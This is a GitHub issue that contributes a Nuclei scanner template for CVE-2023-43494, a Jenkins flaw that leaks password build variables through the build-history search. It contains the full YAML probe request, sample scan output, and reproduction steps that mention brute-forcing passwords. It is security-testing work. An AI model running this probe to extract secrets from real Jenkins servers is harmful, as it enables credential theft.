Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added CVE-2023-43494 Template #10550

Open
sagarwal395 opened this issue Aug 15, 2024 · 4 comments
Open

Added CVE-2023-43494 Template #10550

sagarwal395 opened this issue Aug 15, 2024 · 4 comments
Assignees
@DhiyaneshGeek
Labels
template-contribution Nuclei template contribution

Comments

@sagarwal395
Copy link

sagarwal395 commented Aug 15, 2024
edited
Loading

Template Information:

Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.

References:
https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261
http://www.openwall.com/lists/oss-security/2023/09/20/5

Nuclei Template:

id: jenkins-cve-2023-43494

info:
  name: Jenkins CVE-2023-43494 Exploit
  author: Saumya Agarwal
  severity: medium
  description: |
    Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/09/20/5
    - https://www.jenkins.io/security/advisory/2023-09-20/#SECURITY-3261
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cve-id: CVE-2023-43494
    cwe-id: CWE-200
  tags: jenkins, cve-2023-43494, exploit

variables:
  project_name: "{{project_name}}"
  search_string: "{{search_string}}"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/job/{{project_name}}/buildHistory/ajax?search={{search_string}}"

    headers:
      accept: "*/*"
      accept-language: "en-US,en;q=0.9"
      sec-fetch-mode: "cors"
      sec-fetch-site: "same-origin"
      referer: "{{BaseURL}}/job/{{project_name}}/"
      referrerPolicy: "same-origin"

    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
          - "(?s)<table[^>]*>.*?<tr[^>]*>.*?</tr>.*?</table>"

Expected output:

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.0

		projectdiscovery.io

[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.3.0 (latest)
[INF] Current nuclei-templates version: v9.9.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[jenkins-cve-2023-43494] [http] [medium] http://sample:1102e6286d7b37da45c20c34d1adeb3800@localhost:8080/job/vulcheck/buildHistory/ajax?search=nuc
@sagarwal395 sagarwal395 added the template-contribution Nuclei template contribution label Aug 15, 2024
@DhiyaneshGeek
Copy link
Member

Hi @sagarwal395

Does this require project_name, search_string inputs supplied via variable option in CLI ?

Looking forward to hear back from you

Thanks

@sagarwal395
Copy link
Author

sagarwal395 commented Aug 15, 2024
edited
Loading

Hi @DhiyaneshGeek,

Yes it does. It also requires the username and password of attackers with Item/Read permission.
On a high level the issue is that the sensitive build variables like password are not excluded from search in build history and an attacker can fuzz through to get passwords used in any builds.

@DhiyaneshGeek
Copy link
Member

@sagarwal395

any docker setup instructions ?

@sagarwal395
Copy link
Author

@sagarwal395

any docker setup instructions ?

As of now no. Sorry have been busy with school. I will share the instructions for docker once ready.
If you wanna quickly test it here are the steps:

  1. Run jenkins 2.41x and create a project with password parameter. Run this job once. You can update the password and run multiple jobs.
  2. Create a User with API key with Read only permission.
  3. Test the committed nuclei template with all the info. The vulnerability allows attacker to search for a job in the history using the password as search string (in the real world scenario these can be brute forced).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels
template-contribution Nuclei template contribution
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@DhiyaneshGeek @sagarwal395